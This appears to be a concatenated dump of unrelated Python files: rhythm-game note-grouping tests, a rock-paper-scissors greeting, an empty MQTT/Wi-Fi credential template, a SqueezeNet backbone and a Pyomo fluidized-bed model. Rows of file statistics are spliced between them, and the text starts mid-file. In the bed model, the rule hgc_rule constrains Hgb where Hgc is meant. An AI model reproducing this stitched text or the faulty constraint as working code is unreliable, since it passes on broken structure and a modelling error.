            [Note(beat=Beat(3), column=2, note_type=NoteType.TAP)],
            [
                Note(beat=Beat(4), column=0, note_type=NoteType.TAP),
                Note(beat=Beat(4), column=1, note_type=NoteType.TAIL),
            ],
            [Note(beat=Beat(5), column=3, note_type=NoteType.TAP)],
            [
                Note(beat=Beat(6), column=0, note_type=NoteType.ROLL_HEAD),
                Note(beat=Beat(6), column=3, note_type=NoteType.ROLL_HEAD),
            ],
            [Note(beat=Beat(7), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(8), column=0, note_type=NoteType.TAIL)],
            [Note(beat=Beat(9), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(10), column=3, note_type=NoteType.TAIL)],
            [Note(beat=Beat(11), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(12), column=0, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(13), column=1, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(14), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(15), column=3, note_type=NoteType.TAP)],
            [
                Note(beat=Beat(16), column=1, note_type=NoteType.TAIL),
                Note(beat=Beat(16), column=2, note_type=NoteType.TAP),
            ],
            [Note(beat=Beat(17), column=3, note_type=NoteType.TAP)],
            [
                Note(beat=Beat(18), column=0, note_type=NoteType.TAIL),
                Note(beat=Beat(18), column=2, note_type=NoteType.TAP),
            ],
            [
                Note(beat=Beat(19), column=0, note_type=NoteType.TAP),
                Note(beat=Beat(19), column=3, note_type=NoteType.TAP),
            ],
        ], grouped_notes)

    def test_same_beat_notes_join_by_note_type(self):
        # JOIN_BY_NOTE_TYPE: same-beat notes group only if types match.
        grouped_notes = list(group_notes(
            testing_valid_notes(),
            same_beat_notes=SameBeatNotes.JOIN_BY_NOTE_TYPE,
        ))
        self.assertListEqual([
            [Note(beat=Beat(0), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(0), column=1, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(1), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(2), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(3), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(4), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(4), column=1, note_type=NoteType.TAIL)],
            [Note(beat=Beat(5), column=3, note_type=NoteType.TAP)],
            [
                Note(beat=Beat(6), column=0, note_type=NoteType.ROLL_HEAD),
                Note(beat=Beat(6), column=3, note_type=NoteType.ROLL_HEAD),
            ],
            [Note(beat=Beat(7), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(8), column=0, note_type=NoteType.TAIL)],
            [Note(beat=Beat(9), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(10), column=3, note_type=NoteType.TAIL)],
            [Note(beat=Beat(11), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(12), column=0, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(13), column=1, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(14), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(15), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(16), column=1, note_type=NoteType.TAIL)],
            [Note(beat=Beat(16), column=2, note_type=NoteType.TAP)],
            [Note(beat=Beat(17), column=3, note_type=NoteType.TAP)],
            [Note(beat=Beat(18), column=0, note_type=NoteType.TAIL)],
            [Note(beat=Beat(18), column=2, note_type=NoteType.TAP)],
            [
                Note(beat=Beat(19), column=0, note_type=NoteType.TAP),
                Note(beat=Beat(19), column=3, note_type=NoteType.TAP),
            ],
        ], grouped_notes)

    def test_invalid_chart_join_heads_to_tails_raises(self):
        # Orphaned heads/tails must raise when joining is requested.
        self.assertRaises(
            OrphanedNoteException,
            list,
            group_notes(testing_invalid_notes(), join_heads_to_tails=True),
        )

    def test_invalid_chart_keep_orphaned_heads_and_tails(self):
        # KEEP_ORPHAN on both sides: orphans pass through as plain Notes.
        grouped_notes = list(group_notes(
            testing_invalid_notes(),
            join_heads_to_tails=True,
            orphaned_head=OrphanedNotes.KEEP_ORPHAN,
            orphaned_tail=OrphanedNotes.KEEP_ORPHAN,
        ))
        self.assertListEqual([
            [Note(beat=Beat(0), column=0, note_type=NoteType.TAIL)],
            [Note(beat=Beat(1), column=1, note_type=NoteType.HOLD_HEAD)],
            [NoteWithTail(beat=Beat(2), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(3))],
            [Note(beat=Beat(3), column=3, note_type=NoteType.ROLL_HEAD)],
            [Note(beat=Beat(4), column=0, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(5), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(6), column=0, note_type=NoteType.TAIL)],
            [Note(beat=Beat(7), column=2, note_type=NoteType.HOLD_HEAD)],
        ], grouped_notes)

    def test_invalid_chart_drop_orphaned_heads_and_tails(self):
        # DROP_ORPHAN on both sides: orphans are removed entirely.
        grouped_notes = list(group_notes(
            testing_invalid_notes(),
            join_heads_to_tails=True,
            orphaned_head=OrphanedNotes.DROP_ORPHAN,
            orphaned_tail=OrphanedNotes.DROP_ORPHAN,
        ))
        self.assertListEqual([
            [NoteWithTail(beat=Beat(2), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(3))],
            [Note(beat=Beat(5), column=0, note_type=NoteType.TAP)],
        ], grouped_notes)

    def test_invalid_chart_drop_orphaned_heads_keep_orphaned_tails(self):
        # Mixed policy: heads dropped, tails kept.
        grouped_notes = list(group_notes(
            testing_invalid_notes(),
            join_heads_to_tails=True,
            orphaned_head=OrphanedNotes.DROP_ORPHAN,
            orphaned_tail=OrphanedNotes.KEEP_ORPHAN,
        ))
        self.assertListEqual([
            [Note(beat=Beat(0), column=0, note_type=NoteType.TAIL)],
            [NoteWithTail(beat=Beat(2), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(3))],
            [Note(beat=Beat(5), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(6), column=0, note_type=NoteType.TAIL)],
        ], grouped_notes)

    def test_invalid_chart_keep_orphaned_heads_drop_orphaned_tails(self):
        # Mixed policy: heads kept, tails dropped.
        grouped_notes = list(group_notes(
            testing_invalid_notes(),
            join_heads_to_tails=True,
            orphaned_head=OrphanedNotes.KEEP_ORPHAN,
            orphaned_tail=OrphanedNotes.DROP_ORPHAN,
        ))
        self.assertListEqual([
            [Note(beat=Beat(1), column=1, note_type=NoteType.HOLD_HEAD)],
            [NoteWithTail(beat=Beat(2), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(3))],
            [Note(beat=Beat(3), column=3, note_type=NoteType.ROLL_HEAD)],
            [Note(beat=Beat(4), column=0, note_type=NoteType.HOLD_HEAD)],
            [Note(beat=Beat(5), column=0, note_type=NoteType.TAP)],
            [Note(beat=Beat(7), column=2, note_type=NoteType.HOLD_HEAD)],
        ], grouped_notes)
class TestUngroupNotes(unittest.TestCase):
    """Tests for ungroup_notes, the inverse of group_notes."""

    def test_with_valid_grouped_notes(self):
        # Round trip: group then ungroup reproduces the original notes.
        notes = list(testing_valid_notes())
        grouped_notes = group_notes(
            notes,
            same_beat_notes=SameBeatNotes.JOIN_ALL,
            join_heads_to_tails=True,
        )
        ungrouped_notes = list(ungroup_notes(grouped_notes))
        self.assertListEqual(notes, ungrouped_notes)

    def test_with_invalid_grouped_notes(self):
        # A NoteWithTail whose type is TAP cannot be split back; raises.
        grouped_notes = [
            [NoteWithTail(
                beat=Beat(0),
                column=0,
                note_type=NoteType.TAP,
                tail_beat=Beat(2),
            )],
            [Note(beat=Beat(1), column=0, note_type=NoteType.TAP)],
        ]
        note_ungrouper = ungroup_notes(grouped_notes)
        self.assertRaises(OrphanedNoteException, list, note_ungrouper)

    def test_keep_orphaned_notes(self):
        # KEEP_ORPHAN: the tail is emitted as a standalone TAIL note.
        grouped_notes = [
            [NoteWithTail(
                beat=Beat(0),
                column=0,
                note_type=NoteType.HOLD_HEAD,
                tail_beat=Beat(2),
            )],
            [Note(beat=Beat(1), column=0, note_type=NoteType.TAP)],
        ]
        ungrouped_notes = list(ungroup_notes(
            grouped_notes,
            orphaned_notes=OrphanedNotes.KEEP_ORPHAN,
        ))
        self.assertListEqual([
            Note(beat=Beat(0), column=0, note_type=NoteType.HOLD_HEAD),
            Note(beat=Beat(1), column=0, note_type=NoteType.TAP),
            Note(beat=Beat(2), column=0, note_type=NoteType.TAIL),
        ], ungrouped_notes)

    def test_drop_orphaned_notes(self):
        # DROP_ORPHAN: the intervening TAP is dropped, head/tail kept.
        grouped_notes = [
            [NoteWithTail(
                beat=Beat(0),
                column=0,
                note_type=NoteType.HOLD_HEAD,
                tail_beat=Beat(2),
            )],
            [Note(beat=Beat(1), column=0, note_type=NoteType.TAP)],
        ]
        ungrouped_notes = list(ungroup_notes(
            grouped_notes,
            orphaned_notes=OrphanedNotes.DROP_ORPHAN,
        ))
        self.assertListEqual([
            Note(beat=Beat(0), column=0, note_type=NoteType.HOLD_HEAD),
            Note(beat=Beat(2), column=0, note_type=NoteType.TAIL),
        ], ungrouped_notes)
| 44.280488
| 102
| 0.584687
| 1,859
| 14,524
| 4.369554
| 0.050027
| 0.13985
| 0.256063
| 0.17075
| 0.914317
| 0.901268
| 0.897329
| 0.87837
| 0.867167
| 0.847347
| 0
| 0.041058
| 0.268865
| 14,524
| 328
| 103
| 44.280488
| 0.723891
| 0
| 0
| 0.747541
| 0
| 0
| 0.012599
| 0
| 0
| 0
| 0
| 0
| 0.042623
| 1
| 0.04918
| false
| 0
| 0.013115
| 0.006557
| 0.07541
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9165a074903032d25c03ea86cdbe3da5abba3c4d
| 92
|
py
|
Python
|
rock_paper_scissors/rps.py
|
juanchaves/python_squad
|
5eac78ac5a5e5ccd179358366fdbbb3177a587ee
|
[
"MIT"
] | null | null | null |
rock_paper_scissors/rps.py
|
juanchaves/python_squad
|
5eac78ac5a5e5ccd179358366fdbbb3177a587ee
|
[
"MIT"
] | null | null | null |
rock_paper_scissors/rps.py
|
juanchaves/python_squad
|
5eac78ac5a5e5ccd179358366fdbbb3177a587ee
|
[
"MIT"
] | null | null | null |
'''
Rock, Paper, Scissors
'''
# Greeting shown when the game starts.
# Fix: "Hell and welcome" was a typo for "Hello and welcome".
print('Hello and welcome to the rock, paper, scissors game!')
| 15.333333
| 60
| 0.673913
| 13
| 92
| 4.769231
| 0.769231
| 0.290323
| 0.548387
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163043
| 92
| 5
| 61
| 18.4
| 0.805195
| 0.228261
| 0
| 0
| 0
| 0
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
9182426ec02a7214c7e1db2eb3f2d536c3667bfa
| 212
|
py
|
Python
|
lib/keychain_empty.py
|
JDWarner/pysense
|
586fd451a16f97d5397bdf346a160b8fa40f358b
|
[
"MIT"
] | null | null | null |
lib/keychain_empty.py
|
JDWarner/pysense
|
586fd451a16f97d5397bdf346a160b8fa40f358b
|
[
"MIT"
] | null | null | null |
lib/keychain_empty.py
|
JDWarner/pysense
|
586fd451a16f97d5397bdf346a160b8fa40f358b
|
[
"MIT"
] | null | null | null |
# Template credential store: copy this file and fill in real values.
# Public API of the module — the five credential names below.
__all__ = ['MQTT_API_KEY',
           'MQTT_WRITE_API_KEY',
           'CHANNEL',
           'wifi_ssid',
           'wifi_pw']
# MQTT broker credentials (left empty in this template).
MQTT_API_KEY = ""
MQTT_WRITE_API_KEY = ""
# Channel identifier for publishing (empty in this template).
CHANNEL = ""
# Wi-Fi network name and password (empty in this template).
wifi_ssid = ''
wifi_pw = ''
| 17.666667
| 32
| 0.533019
| 25
| 212
| 3.8
| 0.36
| 0.252632
| 0.210526
| 0.294737
| 0.968421
| 0.968421
| 0.968421
| 0.968421
| 0.968421
| 0.968421
| 0
| 0
| 0.316038
| 212
| 11
| 33
| 19.272727
| 0.655172
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
919a45d486878aa91c53fa232f09c4c5c06a67e9
| 255
|
py
|
Python
|
rastervision/data/label/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | 4
|
2019-03-11T12:38:15.000Z
|
2021-04-06T14:57:52.000Z
|
rastervision/data/label/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | null | null | null |
rastervision/data/label/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | 1
|
2021-12-02T08:07:21.000Z
|
2021-12-02T08:07:21.000Z
|
# flake8: noqa
from rastervision.data.label.labels import *
from rastervision.data.label.chip_classification_labels import *
from rastervision.data.label.object_detection_labels import *
from rastervision.data.label.semantic_segmentation_labels import *
| 36.428571
| 66
| 0.85098
| 32
| 255
| 6.59375
| 0.4375
| 0.303318
| 0.379147
| 0.473934
| 0.526066
| 0.526066
| 0
| 0
| 0
| 0
| 0
| 0.004255
| 0.078431
| 255
| 6
| 67
| 42.5
| 0.893617
| 0.047059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
91dedf9396fe27ca781cdbc1f3827437ef3cd792
| 7,820
|
py
|
Python
|
easyai/model/backbone/cls/squeezenet.py
|
lpj0822/image_point_cloud_det
|
7b20e2f42f3f2ff4881485da58ad188a1f0d0e0f
|
[
"MIT"
] | 1
|
2020-09-05T09:18:56.000Z
|
2020-09-05T09:18:56.000Z
|
easyai/model/backbone/cls/squeezenet.py
|
lpj0822/image_point_cloud_det
|
7b20e2f42f3f2ff4881485da58ad188a1f0d0e0f
|
[
"MIT"
] | 8
|
2020-04-20T02:18:55.000Z
|
2022-03-12T00:24:50.000Z
|
easyai/model/backbone/cls/squeezenet.py
|
lpj0822/image_point_cloud_det
|
7b20e2f42f3f2ff4881485da58ad188a1f0d0e0f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:
from easyai.base_name.backbone_name import BackboneName
from easyai.base_name.block_name import NormalizationType, ActivationType
from easyai.base_name.block_name import LayerType
from easyai.model.backbone.utility.base_backbone import *
from easyai.model.base_block.utility.utility_block import ConvActivationBlock
from easyai.model.base_block.cls.squeezenet_block import FireBlock
__all__ = ['SqueezeNet', 'DilatedSqueezeNet']
class SqueezeNet(BaseBackbone):
    """SqueezeNet classification backbone.

    Layout: stem conv (3x3, stride 2) -> max-pool -> fire blocks 1-2 ->
    max-pool -> fire blocks 3-4 -> max-pool -> fire blocks 5-8.  Every
    layer is registered via add_block_list so forward() can return all
    intermediate feature maps.

    Fix: the eight copy-pasted fire-block stanzas are factored into
    _add_fire/_add_max_pool helpers, and the misspelled local
    "output_channle" is gone.  Registration order and arguments are
    unchanged.
    """

    def __init__(self, data_channel=3, bnName=NormalizationType.BatchNormalize2d,
                 activationName=ActivationType.ReLU):
        super(SqueezeNet, self).__init__()
        self.set_name(BackboneName.SqueezeNet)
        self.data_channel = data_channel
        self.activationName = activationName
        self.bnName = bnName  # stored but unused by create_block_list
        self.first_output = 64
        self.create_block_list()

    def create_block_list(self):
        """(Re)build the ordered list of backbone blocks."""
        self.clear_list()
        stem = ConvActivationBlock(in_channels=self.data_channel,
                                   out_channels=self.first_output,
                                   kernel_size=3,
                                   stride=2,
                                   padding=0,
                                   dilation=1,
                                   activationName=self.activationName)
        self.add_block_list(stem.get_name(), stem, self.first_output)
        out_channels = self.first_output
        self._add_max_pool(out_channels)
        # (squeeze, expand1, expand2) channel plans per fire block,
        # grouped by the pooling stages between them.
        for planes in ((16, 64, 64), (16, 64, 64)):
            out_channels = self._add_fire(planes)
        self._add_max_pool(out_channels)
        for planes in ((32, 128, 128), (32, 128, 128)):
            out_channels = self._add_fire(planes)
        self._add_max_pool(out_channels)
        for planes in ((48, 192, 192), (48, 192, 192),
                       (64, 256, 256), (64, 256, 256)):
            out_channels = self._add_fire(planes)

    def _add_max_pool(self, out_channels):
        """Append a 3x3 stride-2 max-pool; channel count is unchanged."""
        pool = nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=False)
        self.add_block_list(LayerType.MyMaxPool2d, pool, out_channels)

    def _add_fire(self, planes):
        """Append a FireBlock fed by the previous block's channel count.

        planes is (squeeze, expand1, expand2); the registered output
        channel count is expand1 + expand2.  Returns that count.
        """
        fire = FireBlock(self.block_out_channels[-1], planes,
                         activationName=self.activationName)
        out_channels = planes[1] + planes[2]
        self.add_block_list(fire.get_name(), fire, out_channels)
        return out_channels

    def forward(self, x):
        """Run x through every registered block; return all outputs."""
        output_list = []
        for block in self._modules.values():
            x = block(x)
            output_list.append(x)
        return output_list
class DilatedSqueezeNet(BaseBackbone):
    """SqueezeNet variant with a dilated tail for denser feature maps.

    Identical to SqueezeNet except that the third max-pool uses stride 1
    (keeping spatial resolution) and fire blocks 5-8 are built with
    dilation=2 to grow the receptive field instead.

    Fix: the eight copy-pasted fire-block stanzas are factored into
    _add_fire/_add_max_pool helpers, and the misspelled local
    "output_channle" is gone.  Registration order and arguments are
    unchanged (dilation is only passed to FireBlock when set, matching
    the original calls).
    """

    def __init__(self, data_channel=3, bnName=NormalizationType.BatchNormalize2d,
                 activationName=ActivationType.ReLU):
        super().__init__()
        self.set_name(BackboneName.DilatedSqueezeNet)
        self.data_channel = data_channel
        self.activationName = activationName
        self.bnName = bnName  # stored but unused by create_block_list
        self.first_output = 64
        self.create_block_list()

    def create_block_list(self):
        """(Re)build the ordered list of backbone blocks."""
        self.clear_list()
        stem = ConvActivationBlock(in_channels=self.data_channel,
                                   out_channels=self.first_output,
                                   kernel_size=3,
                                   stride=2,
                                   padding=0,
                                   dilation=1,
                                   activationName=self.activationName)
        self.add_block_list(stem.get_name(), stem, self.first_output)
        out_channels = self.first_output
        self._add_max_pool(out_channels, stride=2)
        for planes in ((16, 64, 64), (16, 64, 64)):
            out_channels = self._add_fire(planes)
        self._add_max_pool(out_channels, stride=2)
        for planes in ((32, 128, 128), (32, 128, 128)):
            out_channels = self._add_fire(planes)
        # Stride-1 pool: resolution is preserved; the dilated fires
        # below compensate with a larger receptive field.
        self._add_max_pool(out_channels, stride=1)
        for planes in ((48, 192, 192), (48, 192, 192),
                       (64, 256, 256), (64, 256, 256)):
            out_channels = self._add_fire(planes, dilation=2)

    def _add_max_pool(self, out_channels, stride):
        """Append a 3x3 max-pool with the given stride."""
        pool = nn.MaxPool2d(kernel_size=3, stride=stride, ceil_mode=False)
        self.add_block_list(LayerType.MyMaxPool2d, pool, out_channels)

    def _add_fire(self, planes, dilation=None):
        """Append a FireBlock; pass dilation only when explicitly set."""
        if dilation is None:
            fire = FireBlock(self.block_out_channels[-1], planes,
                             activationName=self.activationName)
        else:
            fire = FireBlock(self.block_out_channels[-1], planes,
                             dilation=dilation,
                             activationName=self.activationName)
        out_channels = planes[1] + planes[2]
        self.add_block_list(fire.get_name(), fire, out_channels)
        return out_channels

    def forward(self, x):
        """Run x through every registered block; return all outputs."""
        output_list = []
        for block in self._modules.values():
            x = block(x)
            output_list.append(x)
        return output_list
| 43.20442
| 98
| 0.64335
| 904
| 7,820
| 5.323009
| 0.102876
| 0.097257
| 0.118454
| 0.079801
| 0.926642
| 0.905445
| 0.905445
| 0.891729
| 0.891729
| 0.891729
| 0
| 0.047872
| 0.254731
| 7,820
| 180
| 99
| 43.444444
| 0.777797
| 0.006266
| 0
| 0.834532
| 0
| 0
| 0.003476
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043165
| false
| 0
| 0.043165
| 0
| 0.115108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37ea95674fb07f05727604ecac2ccb5cd7117b32
| 67,495
|
py
|
Python
|
sample_mods/bfb/bfb_abs_cons6vgdt.py
|
kuanhanl/cappresse
|
31cd7d03414a930f7e2c21e1a3eb5e7dd25cc500
|
[
"MIT"
] | 2
|
2019-09-26T20:56:06.000Z
|
2019-11-18T21:03:27.000Z
|
sample_mods/bfb/bfb_abs_cons6vgdt.py
|
kuanhanl/cappresse
|
31cd7d03414a930f7e2c21e1a3eb5e7dd25cc500
|
[
"MIT"
] | 6
|
2018-03-19T20:36:49.000Z
|
2018-04-13T15:27:29.000Z
|
sample_mods/bfb/bfb_abs_cons6vgdt.py
|
kuanhanl/cappresse
|
31cd7d03414a930f7e2c21e1a3eb5e7dd25cc500
|
[
"MIT"
] | 5
|
2018-10-04T18:51:02.000Z
|
2020-07-02T15:31:35.000Z
|
from __future__ import division
from pyomo.core.base import Constraint, sqrt, exp, Expression
from nmpc_mhe.aux.cpoinsc import collptsgen
from nmpc_mhe.aux.lagrange_f import lgr, lgry, lgrdot, lgrydot
"""
Version note implemented momentum balance and diffusive terms for the bubble region (gas)
"""
__author__ = 'David M Thierry @dthierry'
def fldoti_x(m, j, k, ncp, a, b):
    """Lagrange-basis derivative coefficient at spatial collocation point k."""
    tau = m.taucp_x[k]
    return lgrdot(j, tau, ncp, a, b)
def fldoti_t(m, j, k, ncp, a, b):
    """Lagrange-basis derivative coefficient at temporal collocation point k."""
    tau = m.taucp_t[k]
    return lgrdot(j, tau, ncp, a, b)
def fldotyi(m, j, k, ncp, a, b):
    """Lagrange(y)-basis derivative at spatial point k; zero for j == 0."""
    if j <= 0:
        return 0.0
    return lgrydot(j, m.taucp_x[k], ncp, a, b)
def flj1_x(m, j, ncp, a, b):
    """Lagrange basis function j evaluated at the element boundary tau = 1."""
    boundary = 1
    return lgr(j, boundary, ncp, a, b)
def flj1_t(m, j, ncp, a, b):
    """Lagrange basis function j evaluated at the time-element boundary tau = 1."""
    boundary = 1
    return lgr(j, boundary, ncp, a, b)
def fljy1(m, j, ncp, a, b):
    """Lagrange(y) basis function j at tau = 1; zero for j == 0."""
    if j <= 0:
        return 0.0
    return lgry(j, 1, ncp, a, b)
def f_lj_x(m, j, k, ncp, a, b):
    """Lagrange basis function j evaluated at spatial collocation point k."""
    tau = m.taucp_x[k]
    return lgr(j, tau, ncp, a, b)
def fir_hi(m, i):
    """Uniform finite-element width: remaining length split over nfe_x elements.

    The element index i is accepted (Pyomo rule signature) but unused —
    all elements share the same width.
    """
    return m.lenleft / m.nfe_x
def fl_irule(m, j, k):
    """Absolute position of collocation point k inside spatial element j.

    Sum of the widths of the preceding elements plus the fractional
    offset tau_i_x[k] scaled by element j's width.
    """
    offset = sum(m.hi_x[i] for i in range(1, j))
    return float(m.hi_x[j] * m.tau_i_x[k] + offset)
def fini_cp(i, y, k, taucp):
    """Linearly interpolate nodal values y onto collocation point k of element i.

    The very first collocation point of the first element (i == 1,
    k == 1) keeps the left nodal value instead of interpolating.
    """
    if i == 1 and k == 1:
        return y[i]
    return (y[i + 1] - y[i]) * taucp[k] + y[i]
def fini_cp_dv(i, y, k, taucp):
    """Linearly interpolate nodal values y onto collocation point k of element i."""
    left = y[i]
    return (y[i + 1] - left) * taucp[k] + left
def gasout_zi_rule(m, fet, cpt, i):
    """Gas-outlet composition rule: the fixed boundary value for species i.

    The time indices fet/cpt are accepted (Pyomo rule signature) but
    unused — the value does not vary in time.
    """
    boundary = m.GasOut_z_ix
    return boundary[i]
# gas bubble
def ic_ngb_rule(m, ix, jx, c):
    """Initial condition: Ngb at (t=1, cp=0) equals its stored initial value.

    Skipped off the interior spatial collocation points.
    """
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Ngb[1, 0, ix, jx, c] == m.Ngb_ic[(ix, jx, c)]
def ic_hgb_rule(m, ix, jx):
    """Initial condition: Hgb at (t=1, cp=0) equals its stored initial value."""
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Hgb[1, 0, ix, jx] == m.Hgb_ic[(ix, jx)]
# gas cloud wake
def ic_ngc_rule(m, ix, jx, c):
    """Initial condition: Ngc at (t=1, cp=0) equals its stored initial value."""
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Ngc[1, 0, ix, jx, c] == m.Ngc_ic[(ix, jx, c)]
def ic_hgc_rule(m, ix, jx):
    """Initial condition: Hgc at (t=1, cp=0) equals its stored initial value."""
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Hgc[1, 0, ix, jx] == m.Hgc_ic[(ix, jx)]
# solid cloud wake
def ic_nsc_rule(m, ix, jx, c):
    """Initial condition: Nsc at (t=1, cp=0) equals its stored initial value."""
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Nsc[1, 0, ix, jx, c] == m.Nsc_ic[(ix, jx, c)]
def ic_hsc_rule(m, ix, jx):
    """Initial condition: Hsc at (t=1, cp=0) equals its stored initial value."""
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Hsc[1, 0, ix, jx] == m.Hsc_ic[(ix, jx)]
# gas emulsion
def ic_nge_rule(m, ix, jx, c):
    """Initial condition: Nge at (t=1, cp=0) equals its stored initial value."""
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Nge[1, 0, ix, jx, c] == m.Nge_ic[(ix, jx, c)]
def ic_hge_rule(m, ix, jx):
    """Initial condition: Hge at (t=1, cp=0) equals its stored initial value."""
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Hge[1, 0, ix, jx] == m.Hge_ic[(ix, jx)]
# solids emulsion
def ic_nse_rule(m, ix, jx, c):
    """Initial condition: Nse at (t=1, cp=0) equals its stored initial value."""
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Nse[1, 0, ix, jx, c] == m.Nse_ic[(ix, jx, c)]
def ic_hse_rule(m, ix, jx):
    """Initial condition: Hse at (t=1, cp=0) equals its stored initial value."""
    if jx <= 0 or jx > m.ncp_x:
        return Constraint.Skip
    return m.Hse[1, 0, ix, jx] == m.Hse_ic[(ix, jx)]
# expr ================================================================================================
# expr ================================================================================================
# gas cloud wake
# cc
def ngc_rule(m, it, jt, ix, jx, c):
    """Definition constraint for Ngc: ties it to the product of Ax, fcw,
    delta, ed and the concentration cc at the same (t, x) index.
    Skipped off the interior collocation points in both t and x.
    """
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return m.Ngc[it, jt, ix, jx, c] == \
               m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * m.ed[it, jt, ix, jx] * \
               m.cc[it, jt, ix, jx, c]
    else:
        return Constraint.Skip
# Tgc
def hgc_rule(m, it, jt, ix, jx):
    """Definition constraint for Hgc: Ax * fcw * delta * ed times the total
    concentration (sum of cc over species) times cpg_mol * Tgc.
    Skipped off the interior collocation points.
    """
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return m.Hgb[it, jt, ix, jx] == \
               m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * m.ed[it, jt, ix, jx] * \
               sum(m.cc[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol * m.Tgc[it, jt, ix, jx]
    else:
        return Constraint.Skip
# solid cloud wake
# nc
def nsc_rule(m, it, jt, ix, jx, c):
    """Definition constraint for Nsc: uses the solids fraction (1 - ed)
    and solids density rhos with the solids loading nc.
    Skipped off the interior collocation points.
    """
    if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
        return m.Nsc[it, jt, ix, jx, c] == \
               m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * m.rhos * \
               m.nc[it, jt, ix, jx, c]
    else:
        return Constraint.Skip
# Tsc
    def hsc_rule(m, it, jt, ix, jx):
        """Holdup definition: Hsc = Ax * fcw * delta * (1 - ed) * rhos * cps * Tsc (cloud-wake solids enthalpy)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Hsc[it, jt, ix, jx] == \
